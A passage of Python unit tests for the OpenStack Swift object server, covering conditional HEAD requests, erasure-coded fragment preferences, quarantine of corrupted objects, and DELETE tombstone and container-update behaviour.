since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp))))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)) - 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def assertECBodyEqual(self, resp, expected):
# we pull the policy index from the request environ since it seems to
# be missing from the response headers
policy_index = int(
resp.request.headers['X-Backend-Storage-Policy-Index'])
policy = POLICIES[policy_index]
frags = encode_frag_archive_bodies(policy, expected)
frag_index = int(resp.headers['X-Object-Sysmeta-Ec-Frag-Index'])
self.assertEqual(resp.body, frags[frag_index])
    def _create_ondisk_fragments(self, policy):
        """Create a known mix of on-disk files for /a/c/o under *policy*.

        Sequence: a durable PUT of 'OLDER' at ts_0 (frag index 0 for EC), a
        POST adding X-Object-Meta-Test at ts_1, then a PUT of 'NEWER' at
        ts_2 (frag index 2 for EC) whose commit is suppressed so the EC data
        file is left non-durable.

        :returns: the (ts_0, ts_1, ts_2) timestamps used.
        """
        # Create some on disk files...
        ts_iter = make_timestamp_iter()
        # PUT at ts_0
        ts_0 = next(ts_iter)
        body = 'OLDER'
        headers = {'X-Timestamp': ts_0.internal,
                   'Content-Length': '5',
                   'Content-Type': 'application/octet-stream',
                   'X-Backend-Storage-Policy-Index': int(policy)}
        if policy.policy_type == EC_POLICY:
            # EC policies store a fragment archive, not the raw body.
            body = encode_frag_archive_bodies(policy, body)[0]
            headers.update({
                'X-Object-Sysmeta-Ec-Frag-Index': '0',
                'Content-Length': len(body),
            })
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = body
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # POST at ts_1
        ts_1 = next(ts_iter)
        headers = {'X-Timestamp': ts_1.internal,
                   'X-Backend-Storage-Policy-Index': int(policy)}
        headers['X-Object-Meta-Test'] = 'abc'
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers=headers)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        # PUT again at ts_2 but without making the data file durable
        ts_2 = next(ts_iter)
        body = 'NEWER'
        headers = {'X-Timestamp': ts_2.internal,
                   'Content-Length': '5',
                   'Content-Type': 'application/octet-stream',
                   'X-Backend-Storage-Policy-Index': int(policy)}
        if policy.policy_type == EC_POLICY:
            body = encode_frag_archive_bodies(policy, body)[2]
            headers.update({
                'X-Object-Sysmeta-Ec-Frag-Index': '2',
                'Content-Length': len(body),
            })
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = body
        # patch the commit method to do nothing so EC object is non-durable
        with mock.patch('swift.obj.diskfile.ECDiskFileWriter.commit'):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        return ts_0, ts_1, ts_2
    def test_GET_HEAD_with_fragment_preferences(self):
        """For each policy, exercise X-Backend-Fragment-Preferences handling
        of GET/HEAD against the on-disk mix from _create_ondisk_fragments():
        for EC, a durable frag 0 at ts_0, a .meta at ts_1 and a non-durable
        frag 2 at ts_2; replicated policies simply serve the ts_2 data.
        """
        for policy in POLICIES:
            ts_0, ts_1, ts_2 = self._create_ondisk_fragments(policy)
            # Fragment indexes the server should report per data timestamp.
            backend_frags = {ts_0.internal: [0], ts_2.internal: [2]}
            def _assert_frag_0_at_ts_0(resp):
                # Durable frag 0 data at ts_0, combined with the ts_1 .meta.
                expect = {
                    'X-Timestamp': ts_1.normal,
                    'X-Backend-Timestamp': ts_1.internal,
                    'X-Backend-Data-Timestamp': ts_0.internal,
                    'X-Backend-Durable-Timestamp': ts_0.internal,
                    'X-Object-Sysmeta-Ec-Frag-Index': '0',
                    'X-Object-Meta-Test': 'abc'}
                self.assertDictContainsSubset(expect, resp.headers)
                self.assertEqual(backend_frags, json.loads(
                    resp.headers['X-Backend-Fragments']))
            def _assert_repl_data_at_ts_2():
                # NOTE: reads ``resp`` from the enclosing loop scope.
                self.assertIn(resp.status_int, (200, 202))
                expect = {
                    'X-Timestamp': ts_2.normal,
                    'X-Backend-Timestamp': ts_2.internal,
                    'X-Backend-Data-Timestamp': ts_2.internal,
                    'X-Backend-Durable-Timestamp': ts_2.internal}
                self.assertDictContainsSubset(expect, resp.headers)
                self.assertNotIn('X-Object-Meta-Test', resp.headers)
            # Sanity check: Request with no preferences should default to the
            # durable frag
            headers = {'X-Backend-Storage-Policy-Index': int(policy)}
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'GET'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                _assert_frag_0_at_ts_0(resp)
                self.assertECBodyEqual(resp, 'OLDER')
            else:
                _assert_repl_data_at_ts_2()
                self.assertEqual(resp.body, 'NEWER')
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'HEAD'})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
            if policy.policy_type == EC_POLICY:
                _assert_frag_0_at_ts_0(resp)
            else:
                _assert_repl_data_at_ts_2()
            # Request with preferences can select the older frag
            prefs = json.dumps(
                [{'timestamp': ts_0.internal, 'exclude': [1, 3]}])
            headers = {'X-Backend-Storage-Policy-Index': int(policy),
                       'X-Backend-Fragment-Preferences': prefs}
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'GET'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                _assert_frag_0_at_ts_0(resp)
                self.assertECBodyEqual(resp, 'OLDER')
            else:
                _assert_repl_data_at_ts_2()
                self.assertEqual(resp.body, 'NEWER')
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'HEAD'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                _assert_frag_0_at_ts_0(resp)
            else:
                _assert_repl_data_at_ts_2()
            def _assert_frag_2_at_ts_2(resp):
                self.assertIn(resp.status_int, (200, 202))
                # do not expect meta file to be included since it is older
                expect = {
                    'X-Timestamp': ts_2.normal,
                    'X-Backend-Timestamp': ts_2.internal,
                    'X-Backend-Data-Timestamp': ts_2.internal,
                    'X-Backend-Durable-Timestamp': ts_0.internal,
                    'X-Object-Sysmeta-Ec-Frag-Index': '2'}
                self.assertDictContainsSubset(expect, resp.headers)
                self.assertEqual(backend_frags, json.loads(
                    resp.headers['X-Backend-Fragments']))
                self.assertNotIn('X-Object-Meta-Test', resp.headers)
            # Request with preferences can select the newer non-durable frag
            prefs = json.dumps(
                [{'timestamp': ts_2.internal, 'exclude': [1, 3]}])
            headers = {'X-Backend-Storage-Policy-Index': int(policy),
                       'X-Backend-Fragment-Preferences': prefs}
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'GET'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                _assert_frag_2_at_ts_2(resp)
                self.assertECBodyEqual(resp, 'NEWER')
            else:
                _assert_repl_data_at_ts_2()
                self.assertEqual(resp.body, 'NEWER')
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'HEAD'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                _assert_frag_2_at_ts_2(resp)
            else:
                _assert_repl_data_at_ts_2()
            # Request with preference for ts_0 but excludes index 0 will
            # default to newest frag
            prefs = json.dumps(
                [{'timestamp': ts_0.internal, 'exclude': [0]}])
            headers = {'X-Backend-Storage-Policy-Index': int(policy),
                       'X-Backend-Fragment-Preferences': prefs}
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'GET'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                _assert_frag_2_at_ts_2(resp)
                self.assertECBodyEqual(resp, 'NEWER')
            else:
                _assert_repl_data_at_ts_2()
                self.assertEqual(resp.body, 'NEWER')
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'HEAD'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                _assert_frag_2_at_ts_2(resp)
            else:
                _assert_repl_data_at_ts_2()
            # Request with preferences that exclude all frags get nothing
            prefs = json.dumps(
                [{'timestamp': ts_0.internal, 'exclude': [0]},
                 {'timestamp': ts_2.internal, 'exclude': [2]}])
            headers = {'X-Backend-Storage-Policy-Index': int(policy),
                       'X-Backend-Fragment-Preferences': prefs}
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'GET'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                self.assertEqual(resp.status_int, 404)
            else:
                _assert_repl_data_at_ts_2()
                self.assertEqual(resp.body, 'NEWER')
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'HEAD'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                self.assertEqual(resp.status_int, 404)
            else:
                _assert_repl_data_at_ts_2()
            # Request with empty preferences will get non-durable
            prefs = json.dumps([])
            headers = {'X-Backend-Storage-Policy-Index': int(policy),
                       'X-Backend-Fragment-Preferences': prefs}
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'GET'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                _assert_frag_2_at_ts_2(resp)
                self.assertECBodyEqual(resp, 'NEWER')
            else:
                _assert_repl_data_at_ts_2()
                self.assertEqual(resp.body, 'NEWER')
            req = Request.blank('/sda1/p/a/c/o', headers=headers,
                                environ={'REQUEST_METHOD': 'HEAD'})
            resp = req.get_response(self.object_controller)
            if policy.policy_type == EC_POLICY:
                _assert_frag_2_at_ts_2(resp)
            else:
                _assert_repl_data_at_ts_2()
    def test_GET_quarantine(self):
        """GET that detects a metadata/content mismatch quarantines the
        object after the body has been served."""
        # Test swift.obj.server.ObjectController.GET
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
                                             policy=POLICIES.legacy)
        disk_file.open()
        file_name = os.path.basename(disk_file._data_file)
        # Corrupt the stored metadata: record the etag of 'VERIF' (and a
        # wrong Content-Length) against the 'VERIFY' data file.
        etag = md5()
        etag.update('VERIF')
        etag = etag.hexdigest()
        metadata = {'X-Timestamp': timestamp, 'name': '/a/c/o',
                    'Content-Length': 6, 'ETag': etag}
        diskfile.write_metadata(disk_file._fp, metadata)
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        # Not quarantined yet: the mismatch is only detected on body read.
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        body = resp.body  # actually does quarantining
        self.assertEqual(body, 'VERIFY')
        self.assertEqual(os.listdir(quar_dir)[0], file_name)
        # Once quarantined, the object is gone.
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
    def test_GET_quarantine_zbyte(self):
        """A zero-byte data file (metadata present, no content) is
        quarantined as soon as GET tries to open it."""
        # Test swift.obj.server.ObjectController.GET
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
                                             policy=POLICIES.legacy)
        disk_file.open()
        file_name = os.path.basename(disk_file._data_file)
        # Recreate the data file with its original xattr metadata but an
        # empty body, simulating truncation to zero bytes.
        with open(disk_file._data_file) as fp:
            metadata = diskfile.read_metadata(fp)
        os.unlink(disk_file._data_file)
        with open(disk_file._data_file, 'w') as fp:
            diskfile.write_metadata(fp, metadata)
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        # The GET itself 404s and the file is moved to quarantine.
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        self.assertEqual(os.listdir(quar_dir)[0], file_name)
    def test_GET_quarantine_range(self):
        """Ranged GETs only quarantine a corrupted object when the range
        covers the full body (partial reads cannot verify the etag)."""
        # Test swift.obj.server.ObjectController.GET
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
                                             policy=POLICIES.legacy)
        disk_file.open()
        file_name = os.path.basename(disk_file._data_file)
        # Corrupt the stored metadata: etag of 'VERIF' recorded against the
        # 'VERIFY' data file.
        etag = md5()
        etag.update('VERIF')
        etag = etag.hexdigest()
        metadata = {'X-Timestamp': timestamp, 'name': '/a/c/o',
                    'Content-Length': 6, 'ETag': etag}
        diskfile.write_metadata(disk_file._fp, metadata)
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        req = Request.blank('/sda1/p/a/c/o')
        req.range = 'bytes=0-4'  # partial
        resp = req.get_response(self.object_controller)
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        # Reading a partial body cannot detect the mismatch: no quarantine.
        resp.body
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        self.assertFalse(os.path.isdir(quar_dir))
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        req = Request.blank('/sda1/p/a/c/o')
        req.range = 'bytes=1-6'  # partial
        resp = req.get_response(self.object_controller)
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        # Still partial: still no quarantine.
        resp.body
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        self.assertFalse(os.path.isdir(quar_dir))
        req = Request.blank('/sda1/p/a/c/o')
        req.range = 'bytes=0-14'  # full
        resp = req.get_response(self.object_controller)
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(disk_file._data_file)))
        self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
        # A range spanning the whole body reads everything, detects the
        # etag mismatch and quarantines the object.
        resp.body
        self.assertTrue(os.path.isdir(quar_dir))
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
    @mock.patch("time.time", mock_time)
    def test_DELETE(self):
        # Test swift.obj.server.ObjectController.DELETE
        """Verify DELETE tombstone semantics: a tombstone is written only
        when the request timestamp is newer than any existing data file or
        tombstone, with 400/404/409/204 returned as appropriate."""
        # No object in the path -> 400.
        req = Request.blank('/sda1/p/a/c',
                            environ={'REQUEST_METHOD': 'DELETE'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
        # Missing X-Timestamp header -> 400.
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
        # The following should have created a tombstone file (404 because
        # the object never existed, but the tombstone still lands on disk).
        timestamp = normalize_timestamp(1000)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        ts_1000_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.ts')
        self.assertTrue(os.path.isfile(ts_1000_file))
        # There should now be a 1000 ts file.
        self.assertEqual(len(os.listdir(os.path.dirname(ts_1000_file))), 1)
        # The following should *not* have created a tombstone file, because
        # t=999 is older than the existing t=1000 tombstone.
        timestamp = normalize_timestamp(999)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        ts_999_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.ts')
        self.assertFalse(os.path.isfile(ts_999_file))
        self.assertTrue(os.path.isfile(ts_1000_file))
        self.assertEqual(len(os.listdir(os.path.dirname(ts_1000_file))), 1)
        # PUT at t=1002 supersedes the tombstone with a data file.
        orig_timestamp = utils.Timestamp(1002).internal
        headers = {'X-Timestamp': orig_timestamp,
                   'Content-Type': 'application/octet-stream',
                   'Content-Length': '4'}
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # There should now be only the 1002 data file (tombstone reclaimed).
        data_1002_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            orig_timestamp + '.data')
        self.assertTrue(os.path.isfile(data_1002_file))
        self.assertEqual(len(os.listdir(os.path.dirname(data_1002_file))), 1)
        # The following should *not* have created a tombstone file: t=1001
        # is older than the live t=1002 data file, so DELETE conflicts.
        timestamp = normalize_timestamp(1001)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
        ts_1001_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.ts')
        self.assertFalse(os.path.isfile(ts_1001_file))
        self.assertTrue(os.path.isfile(data_1002_file))
        self.assertEqual(len(os.listdir(os.path.dirname(ts_1001_file))), 1)
        # DELETE newer than the data file -> 204 and a tombstone replaces it.
        timestamp = normalize_timestamp(1003)
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'DELETE'},
                            headers={'X-Timestamp': timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        ts_1003_file = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.ts')
        self.assertTrue(os.path.isfile(ts_1003_file))
        self.assertEqual(len(os.listdir(os.path.dirname(ts_1003_file))), 1)
def test_DELETE_bad_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': 'bad'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_DELETE_succeeds_with_later_POST(self):
t_put = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
t_delete = next(self.ts).internal
t_post = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t_post})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': t_delete},
)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')))
ts_file = os.path.join(obj_dir, t_delete + '.ts')
self.assertTrue(os.path.isfile(ts_file))
meta_file = os.path.join(obj_dir, t_post + '.meta')
self.assertTrue(os.path.isfile(meta_file))
    def test_DELETE_container_updates(self):
        # Test swift.obj.server.ObjectController.DELETE and container
        # updates, making sure container update is called in the correct
        # state.
        """A container update is triggered only when a DELETE actually
        changes on-disk state (timestamp newer than what is stored); stale
        DELETEs make no update and write no tombstone."""
        start = time()
        orig_timestamp = utils.Timestamp(start)
        headers = {'X-Timestamp': orig_timestamp.internal,
                   'Content-Type': 'application/octet-stream',
                   'Content-Length': '4'}
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = 'test'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # Count container_update invocations via a list so the nested
        # function can mutate it (Python 2 has no `nonlocal`).
        calls_made = [0]
        def our_container_update(*args, **kwargs):
            calls_made[0] += 1
        orig_cu = self.object_controller.container_update
        self.object_controller.container_update = our_container_update
        try:
            # The following request should return 409 (HTTP Conflict). A
            # tombstone file should not have been created with this timestamp.
            timestamp = utils.Timestamp(start - 0.00001)
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'DELETE'},
                                headers={'X-Timestamp': timestamp.internal})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 409)
            self.assertEqual(resp.headers['x-backend-timestamp'],
                             orig_timestamp.internal)
            objfile = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                                  hash_path('a', 'c', 'o')),
                utils.Timestamp(timestamp).internal + '.ts')
            self.assertFalse(os.path.isfile(objfile))
            self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
            self.assertEqual(0, calls_made[0])
            # The following request should return 204, and the object should
            # be truly deleted (container update is performed) because this
            # timestamp is newer. A tombstone file should have been created
            # with this timestamp.
            timestamp = utils.Timestamp(start + 0.00001)
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'DELETE'},
                                headers={'X-Timestamp': timestamp.internal})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 204)
            objfile = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                                  hash_path('a', 'c', 'o')),
                utils.Timestamp(timestamp).internal + '.ts')
            self.assertTrue(os.path.isfile(objfile))
            self.assertEqual(1, calls_made[0])
            self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
            # The following request should return a 404, as the object should
            # already have been deleted, but it should have also performed a
            # container update because the timestamp is newer, and a tombstone
            # file should also exist with this timestamp.
            timestamp = utils.Timestamp(start + 0.00002)
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'DELETE'},
                                headers={'X-Timestamp': timestamp.internal})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
            objfile = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                                  hash_path('a', 'c', 'o')),
                utils.Timestamp(timestamp).internal + '.ts')
            self.assertTrue(os.path.isfile(objfile))
            self.assertEqual(2, calls_made[0])
            self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
            # The following request should return a 404, as the object should
            # already have been deleted, and it should not have performed a
            # container update because the timestamp is older, or created a
            # tombstone file with this timestamp.
            timestamp = utils.Timestamp(start + 0.00001)
            req = Request.blank('/sda1/p/a/c/o',
                                environ={'REQUEST_METHOD': 'DELETE'},
                                headers={'X-Timestamp': timestamp.internal})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
            objfile = os.path.join(
                self.testdir, 'sda1',
                storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                                  hash_path('a', 'c', 'o')),
                utils.Timestamp(timestamp).internal + '.ts')
            self.assertFalse(os.path.isfile(objfile))
            self.assertEqual(2, calls_made[0])
            self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
        finally:
            # Always restore the real container_update for later tests.
            self.object_controller.container_update = orig_cu
def test_DELETE_full_drive(self):
def mock_diskfile_delete(self, timestamp):
raise DiskFileNoSpace()
t_put = utils.Timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put.internal,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
with mock.patch('swift.obj.diskfile.BaseDiskFile.delete',
mock_diskfile_delete):
t_delete = utils.Timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': t_delete.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
    def test_object_update_with_offset(self):
        """Timestamps with an offset part (t_offset) order correctly against
        plain timestamps for PUT and DELETE, and every state change emits
        exactly one container update carrying the offset timestamp."""
        container_updates = []
        def capture_updates(ip, port, method, path, headers, *args, **kwargs):
            # Record each container-update request the server fires.
            container_updates.append((ip, port, method, path, headers))
        # create a new object
        create_timestamp = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test1',
                            headers={'X-Timestamp': create_timestamp,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p',
                                     'Content-Type': 'text/plain'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'PUT')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Size': len('test1'),
                'X-Etag': md5('test1').hexdigest(),
                'X-Content-Type': 'text/plain',
                'X-Timestamp': create_timestamp,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back object
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.headers['X-Timestamp'],
                         utils.Timestamp(create_timestamp).normal)
        self.assertEqual(resp.headers['X-Backend-Timestamp'],
                         create_timestamp)
        self.assertEqual(resp.body, 'test1')
        # send an update with an offset
        offset_timestamp = utils.Timestamp(
            create_timestamp, offset=1).internal
        req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test2',
                            headers={'X-Timestamp': offset_timestamp,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p',
                                     'Content-Type': 'text/html'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
            with fake_spawn():
                resp = req.get_response(self.object_controller)
        self.assertRaises(StopIteration, fake_conn.code_iter.next)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(1, len(container_updates))
        for update in container_updates:
            ip, port, method, path, headers = update
            self.assertEqual(ip, '10.0.0.1')
            self.assertEqual(port, '8080')
            self.assertEqual(method, 'PUT')
            self.assertEqual(path, '/sda1/p/a/c/o')
            expected = {
                'X-Size': len('test2'),
                'X-Etag': md5('test2').hexdigest(),
                'X-Content-Type': 'text/html',
                'X-Timestamp': offset_timestamp,
            }
            for key, value in expected.items():
                self.assertEqual(headers[key], str(value))
        container_updates = []  # reset
        # read back new offset
        req = Request.blank('/sda1/p/a/c/o', method='GET')
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.headers['X-Timestamp'],
                         utils.Timestamp(offset_timestamp).normal)
        self.assertEqual(resp.headers['X-Backend-Timestamp'],
                         offset_timestamp)
        self.assertEqual(resp.body, 'test2')
        # now overwrite with a newer time
        overwrite_timestamp = next(self.ts).internal
        req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test3',
                            headers={'X-Timestamp': overwrite_timestamp,
                                     'X-Container-Host': '10.0.0.1:8080',
                                     'X-Container-Device': 'sda1',
                                     'X-Container-Partition': 'p',
                                     'Content-Type': 'text/enriched'})
        with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
